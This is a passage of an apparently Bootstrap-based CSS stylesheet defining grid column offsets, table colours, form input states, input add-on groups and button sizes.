  }
  .col-sm-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-sm-offset-3 {
    margin-left: 25%;
  }
  .col-sm-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-sm-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-sm-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 992px) {
  .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 {
    float: left;
  }
  .col-md-12 {
    width: 100%;
  }
  .col-md-11 {
    width: 91.66666667%;
  }
  .col-md-10 {
    width: 83.33333333%;
  }
  .col-md-9 {
    width: 75%;
  }
  .col-md-8 {
    width: 66.66666667%;
  }
  .col-md-7 {
    width: 58.33333333%;
  }
  .col-md-6 {
    width: 50%;
  }
  .col-md-5 {
    width: 41.66666667%;
  }
  .col-md-4 {
    width: 33.33333333%;
  }
  .col-md-3 {
    width: 25%;
  }
  .col-md-2 {
    width: 16.66666667%;
  }
  .col-md-1 {
    width: 8.33333333%;
  }
  .col-md-pull-12 {
    right: 100%;
  }
  .col-md-pull-11 {
    right: 91.66666667%;
  }
  .col-md-pull-10 {
    right: 83.33333333%;
  }
  .col-md-pull-9 {
    right: 75%;
  }
  .col-md-pull-8 {
    right: 66.66666667%;
  }
  .col-md-pull-7 {
    right: 58.33333333%;
  }
  .col-md-pull-6 {
    right: 50%;
  }
  .col-md-pull-5 {
    right: 41.66666667%;
  }
  .col-md-pull-4 {
    right: 33.33333333%;
  }
  .col-md-pull-3 {
    right: 25%;
  }
  .col-md-pull-2 {
    right: 16.66666667%;
  }
  .col-md-pull-1 {
    right: 8.33333333%;
  }
  .col-md-pull-0 {
    right: auto;
  }
  .col-md-push-12 {
    left: 100%;
  }
  .col-md-push-11 {
    left: 91.66666667%;
  }
  .col-md-push-10 {
    left: 83.33333333%;
  }
  .col-md-push-9 {
    left: 75%;
  }
  .col-md-push-8 {
    left: 66.66666667%;
  }
  .col-md-push-7 {
    left: 58.33333333%;
  }
  .col-md-push-6 {
    left: 50%;
  }
  .col-md-push-5 {
    left: 41.66666667%;
  }
  .col-md-push-4 {
    left: 33.33333333%;
  }
  .col-md-push-3 {
    left: 25%;
  }
  .col-md-push-2 {
    left: 16.66666667%;
  }
  .col-md-push-1 {
    left: 8.33333333%;
  }
  .col-md-push-0 {
    left: auto;
  }
  .col-md-offset-12 {
    margin-left: 100%;
  }
  .col-md-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-md-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-md-offset-9 {
    margin-left: 75%;
  }
  .col-md-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-md-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-md-offset-6 {
    margin-left: 50%;
  }
  .col-md-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-md-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-md-offset-3 {
    margin-left: 25%;
  }
  .col-md-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-md-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-md-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 1200px) {
  .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 {
    float: left;
  }
  .col-lg-12 {
    width: 100%;
  }
  .col-lg-11 {
    width: 91.66666667%;
  }
  .col-lg-10 {
    width: 83.33333333%;
  }
  .col-lg-9 {
    width: 75%;
  }
  .col-lg-8 {
    width: 66.66666667%;
  }
  .col-lg-7 {
    width: 58.33333333%;
  }
  .col-lg-6 {
    width: 50%;
  }
  .col-lg-5 {
    width: 41.66666667%;
  }
  .col-lg-4 {
    width: 33.33333333%;
  }
  .col-lg-3 {
    width: 25%;
  }
  .col-lg-2 {
    width: 16.66666667%;
  }
  .col-lg-1 {
    width: 8.33333333%;
  }
  .col-lg-pull-12 {
    right: 100%;
  }
  .col-lg-pull-11 {
    right: 91.66666667%;
  }
  .col-lg-pull-10 {
    right: 83.33333333%;
  }
  .col-lg-pull-9 {
    right: 75%;
  }
  .col-lg-pull-8 {
    right: 66.66666667%;
  }
  .col-lg-pull-7 {
    right: 58.33333333%;
  }
  .col-lg-pull-6 {
    right: 50%;
  }
  .col-lg-pull-5 {
    right: 41.66666667%;
  }
  .col-lg-pull-4 {
    right: 33.33333333%;
  }
  .col-lg-pull-3 {
    right: 25%;
  }
  .col-lg-pull-2 {
    right: 16.66666667%;
  }
  .col-lg-pull-1 {
    right: 8.33333333%;
  }
  .col-lg-pull-0 {
    right: auto;
  }
  .col-lg-push-12 {
    left: 100%;
  }
  .col-lg-push-11 {
    left: 91.66666667%;
  }
  .col-lg-push-10 {
    left: 83.33333333%;
  }
  .col-lg-push-9 {
    left: 75%;
  }
  .col-lg-push-8 {
    left: 66.66666667%;
  }
  .col-lg-push-7 {
    left: 58.33333333%;
  }
  .col-lg-push-6 {
    left: 50%;
  }
  .col-lg-push-5 {
    left: 41.66666667%;
  }
  .col-lg-push-4 {
    left: 33.33333333%;
  }
  .col-lg-push-3 {
    left: 25%;
  }
  .col-lg-push-2 {
    left: 16.66666667%;
  }
  .col-lg-push-1 {
    left: 8.33333333%;
  }
  .col-lg-push-0 {
    left: auto;
  }
  .col-lg-offset-12 {
    margin-left: 100%;
  }
  .col-lg-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-lg-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-lg-offset-9 {
    margin-left: 75%;
  }
  .col-lg-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-lg-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-lg-offset-6 {
    margin-left: 50%;
  }
  .col-lg-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-lg-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-lg-offset-3 {
    margin-left: 25%;
  }
  .col-lg-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-lg-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-lg-offset-0 {
    margin-left: 0%;
  }
}
table {
  background-color: transparent;
}
caption {
  padding-top: 8px;
  padding-bottom: 8px;
  color: #999999;
  text-align: left;
}
th {
  text-align: left;
}
.table {
  width: 100%;
  max-width: 100%;
  margin-bottom: 20px;
}
.table > thead > tr > th,
.table > tbody > tr > th,
.table > tfoot > tr > th,
.table > thead > tr > td,
.table > tbody > tr > td,
.table > tfoot > tr > td {
  padding: 8px;
  line-height: 1.42857143;
  vertical-align: top;
  border-top: 1px solid #dddddd;
}
.table > thead > tr > th {
  vertical-align: bottom;
  border-bottom: 2px solid #dddddd;
}
.table > caption + thead > tr:first-child > th,
.table > colgroup + thead > tr:first-child > th,
.table > thead:first-child > tr:first-child > th,
.table > caption + thead > tr:first-child > td,
.table > colgroup + thead > tr:first-child > td,
.table > thead:first-child > tr:first-child > td {
  border-top: 0;
}
.table > tbody + tbody {
  border-top: 2px solid #dddddd;
}
.table .table {
  background-color: #ffffff;
}
.table-condensed > thead > tr > th,
.table-condensed > tbody > tr > th,
.table-condensed > tfoot > tr > th,
.table-condensed > thead > tr > td,
.table-condensed > tbody > tr > td,
.table-condensed > tfoot > tr > td {
  padding: 5px;
}
.table-bordered {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
  border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-of-type(odd) {
  background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover {
  background-color: #f5f5f5;
}
table col[class*="col-"] {
  position: static;
  float: none;
  display: table-column;
}
table td[class*="col-"],
table th[class*="col-"] {
  position: static;
  float: none;
  display: table-cell;
}
.table > thead > tr > td.active,
.table > tbody > tr > td.active,
.table > tfoot > tr > td.active,
.table > thead > tr > th.active,
.table > tbody > tr > th.active,
.table > tfoot > tr > th.active,
.table > thead > tr.active > td,
.table > tbody > tr.active > td,
.table > tfoot > tr.active > td,
.table > thead > tr.active > th,
.table > tbody > tr.active > th,
.table > tfoot > tr.active > th {
  background-color: #f5f5f5;
}
.table-hover > tbody > tr > td.active:hover,
.table-hover > tbody > tr > th.active:hover,
.table-hover > tbody > tr.active:hover > td,
.table-hover > tbody > tr:hover > .active,
.table-hover > tbody > tr.active:hover > th {
  background-color: #e8e8e8;
}
.table > thead > tr > td.success,
.table > tbody > tr > td.success,
.table > tfoot > tr > td.success,
.table > thead > tr > th.success,
.table > tbody > tr > th.success,
.table > tfoot > tr > th.success,
.table > thead > tr.success > td,
.table > tbody > tr.success > td,
.table > tfoot > tr.success > td,
.table > thead > tr.success > th,
.table > tbody > tr.success > th,
.table > tfoot > tr.success > th {
  background-color: #dff0d8;
}
.table-hover > tbody > tr > td.success:hover,
.table-hover > tbody > tr > th.success:hover,
.table-hover > tbody > tr.success:hover > td,
.table-hover > tbody > tr:hover > .success,
.table-hover > tbody > tr.success:hover > th {
  background-color: #d0e9c6;
}
.table > thead > tr > td.info,
.table > tbody > tr > td.info,
.table > tfoot > tr > td.info,
.table > thead > tr > th.info,
.table > tbody > tr > th.info,
.table > tfoot > tr > th.info,
.table > thead > tr.info > td,
.table > tbody > tr.info > td,
.table > tfoot > tr.info > td,
.table > thead > tr.info > th,
.table > tbody > tr.info > th,
.table > tfoot > tr.info > th {
  background-color: #d9edf7;
}
.table-hover > tbody > tr > td.info:hover,
.table-hover > tbody > tr > th.info:hover,
.table-hover > tbody > tr.info:hover > td,
.table-hover > tbody > tr:hover > .info,
.table-hover > tbody > tr.info:hover > th {
  background-color: #c4e3f3;
}
.table > thead > tr > td.warning,
.table > tbody > tr > td.warning,
.table > tfoot > tr > td.warning,
.table > thead > tr > th.warning,
.table > tbody > tr > th.warning,
.table > tfoot > tr > th.warning,
.table > thead > tr.warning > td,
.table > tbody > tr.warning > td,
.table > tfoot > tr.warning > td,
.table > thead > tr.warning > th,
.table > tbody > tr.warning > th,
.table > tfoot > tr.warning > th {
  background-color: #fcf8e3;
}
.table-hover > tbody > tr > td.warning:hover,
.table-hover > tbody > tr > th.warning:hover,
.table-hover > tbody > tr.warning:hover > td,
.table-hover > tbody > tr:hover > .warning,
.table-hover > tbody > tr.warning:hover > th {
  background-color: #faf2cc;
}
.table > thead > tr > td.danger,
.table > tbody > tr > td.danger,
.table > tfoot > tr > td.danger,
.table > thead > tr > th.danger,
.table > tbody > tr > th.danger,
.table > tfoot > tr > th.danger,
.table > thead > tr.danger > td,
.table > tbody > tr.danger > td,
.table > tfoot > tr.danger > td,
.table > thead > tr.danger > th,
.table > tbody > tr.danger > th,
.table > tfoot > tr.danger > th {
  background-color: #f2dede;
}
.table-hover > tbody > tr > td.danger:hover,
.table-hover > tbody > tr > th.danger:hover,
.table-hover > tbody > tr.danger:hover > td,
.table-hover > tbody > tr:hover > .danger,
.table-hover > tbody > tr.danger:hover > th {
  background-color: #ebcccc;
}
.table-responsive {
  overflow-x: auto;
  min-height: 0.01%;
}
@media screen and (max-width: 767px) {
  .table-responsive {
    width: 100%;
    margin-bottom: 15px;
    overflow-y: hidden;
    -ms-overflow-style: -ms-autohiding-scrollbar;
    border: 1px solid #dddddd;
  }
  .table-responsive > .table {
    margin-bottom: 0;
  }
  .table-responsive > .table > thead > tr > th,
  .table-responsive > .table > tbody > tr > th,
  .table-responsive > .table > tfoot > tr > th,
  .table-responsive > .table > thead > tr > td,
  .table-responsive > .table > tbody > tr > td,
  .table-responsive > .table > tfoot > tr > td {
    white-space: nowrap;
  }
  .table-responsive > .table-bordered {
    border: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:first-child,
  .table-responsive > .table-bordered > tbody > tr > th:first-child,
  .table-responsive > .table-bordered > tfoot > tr > th:first-child,
  .table-responsive > .table-bordered > thead > tr > td:first-child,
  .table-responsive > .table-bordered > tbody > tr > td:first-child,
  .table-responsive > .table-bordered > tfoot > tr > td:first-child {
    border-left: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:last-child,
  .table-responsive > .table-bordered > tbody > tr > th:last-child,
  .table-responsive > .table-bordered > tfoot > tr > th:last-child,
  .table-responsive > .table-bordered > thead > tr > td:last-child,
  .table-responsive > .table-bordered > tbody > tr > td:last-child,
  .table-responsive > .table-bordered > tfoot > tr > td:last-child {
    border-right: 0;
  }
  .table-responsive > .table-bordered > tbody > tr:last-child > th,
  .table-responsive > .table-bordered > tfoot > tr:last-child > th,
  .table-responsive > .table-bordered > tbody > tr:last-child > td,
  .table-responsive > .table-bordered > tfoot > tr:last-child > td {
    border-bottom: 0;
  }
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.inputbox {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  background-color: #eeeeee;
  opacity: 1;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
  background-color: #eeeeee;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-mini {
  width: 60px;
}
.input-small {
  width: 90px;
}
.input-medium {
  width: 150px;
}
.input-large {
  width: 210px;
}
.input-xlarge {
  width: 270px;
}
.input-xxlarge {
  width: 530px;
}
input.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
selectinput.input-sm {
  height: 30px;
  line-height: 30px;
}
textareainput.input-sm,
select[multiple]input.input-sm {
  height: auto;
}
input.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
selectinput.input-lg {
  height: 45px;
  line-height: 45px;
}
textareainput.input-lg,
select[multiple]input.input-lg {
  height: auto;
}
@media (min-width: 768px) {
  .form-inline .inputbox,
  .form-inline select,
  .form-inline textarea,
  .form-inline input {
    display: inline-block;
  }
}
.control-group {
  margin-bottom: 10px;
}
legend + .control-group {
  margin-top: 20px;
  -webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
  margin-bottom: 20px;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  content: " ";
  display: table;
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  content: " ";
  display: table;
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group .control-label {
  display: block;
  width: 100%;
}
@media (min-width: 768px) {
  .form-horizontal .control-group .control-label {
    display: inline-block;
    float: left;
    width: 160px;
    padding-top: 5px;
    text-align: right;
  }
}
.form-horizontal .control-group .controls {
  margin-left: 180px;
}
.form-actions {
  padding: 20px;
  margin: 20px 0;
  background-color: #eeeeee;
  border-radius: 0px;
}
.form-actions:before,
.form-actions:after {
  content: " ";
  display: table;
}
.form-actions:after {
  clear: both;
}
.form-actions:before,
.form-actions:after {
  content: " ";
  display: table;
}
.form-actions:after {
  clear: both;
}
.form-actions [class*="col-sm-offset-"],
.form-actions [class*="col-md-offset-"] {
  padding-left: 5px !important;
}
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: 10px;
  vertical-align: middle;
  font-size: 0;
  white-space: nowrap;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input,
.input-append .dropdown-menu,
.input-prepend .dropdown-menu,
.input-append .popover,
.input-prepend .popover {
  font-size: 14px;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input {
  position: relative;
  margin-bottom: 0;
  *margin-left: 0;
  vertical-align: top;
  border-radius: 0 0px 0px 0;
}
.input-append input:focus,
.input-prepend input:focus,
.input-append select:focus,
.input-prepend select:focus,
.input-append .uneditable-input:focus,
.input-prepend .uneditable-input:focus {
  z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
  display: inline-block;
  width: auto;
  height: 34px;
  min-width: 16px;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #ccc;
}
.input-append .add-on,
.input-prepend .add-on,
.input-append .btn,
.input-prepend .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .btn-group > .dropdown-toggle {
  vertical-align: top;
  border-radius: 0;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.input-prepend .add-on,
.input-prepend .btn {
  margin-right: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
  border-radius: 0px 0 0 0px;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
  border-radius: 0px 0 0 0px;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
  border-radius: 0 0px 0px 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
  margin-left: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
  border-radius: 0 0px 0px 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
  border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
  border-radius: 0 0px 0px 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
  margin-right: -1px;
  border-radius: 0px 0 0 0px;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
  margin-left: -1px;
  border-radius: 0 0px 0px 0;
}
.input-prepend.input-append .btn-group:first-child {
  margin-left: 0;
}
.btn-large {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0px;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
  margin-top: 4px;
}
.btn-small {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0px;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
  margin-top: 0;
}
.btn-mini {
  padding: 2px 4px;
  font-size: 12px;
  border-radius: 0px;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
  margin-top: -1px;
}

fieldset {
  padding: 0;
  margin: 0;
  border: 0;
  min-width: 0;
}
legend {
  display: block;
  width: 100%;
  padding: 0;
  margin-bottom: 20px;
  font-size: 21px;
  line-height: inherit;
  color: #444444;
  border: 0;
  border-bottom: 1px solid #e5e5e5;
}
label {
  display: inline-block;
  max-width: 100%;
  margin-bottom: 5px;
  font-weight: bold;
}
input[type="search"] {
